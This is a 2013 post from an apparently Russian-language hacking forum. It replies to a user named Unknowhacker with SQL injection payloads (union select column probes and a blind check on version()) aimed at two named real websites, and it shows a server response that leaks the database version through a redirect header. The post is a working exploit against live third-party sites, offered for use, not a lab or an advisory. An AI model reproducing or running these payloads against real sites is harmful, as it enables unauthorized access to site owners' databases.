
10.10.2013, 15:06
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Unknowhacker
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
www.mebi.us/out.php?id=5 +and+mid(version(),1,1)=5
upd
Второй случай более интересен:
www.sport-trade.ru/out.php?id=-9' +union+select+1,2,3,4,5,6,7,8,9,version(),11+--+
Смотрим заголовок ответа сервера:
HTTP/1.1 302 Moved Temporarily
Servernginx/1.1.5
DateThu,10 Oct 2013 10:31:04 GMT
Content-Type text/ng
Transfer-Encoding chunked
Connectionkeep-alive
X-Powered-By PHP/5.2.17
location/out.php?id= 5.1.70-cll
Ну или смотри адресную строку.
|
|
|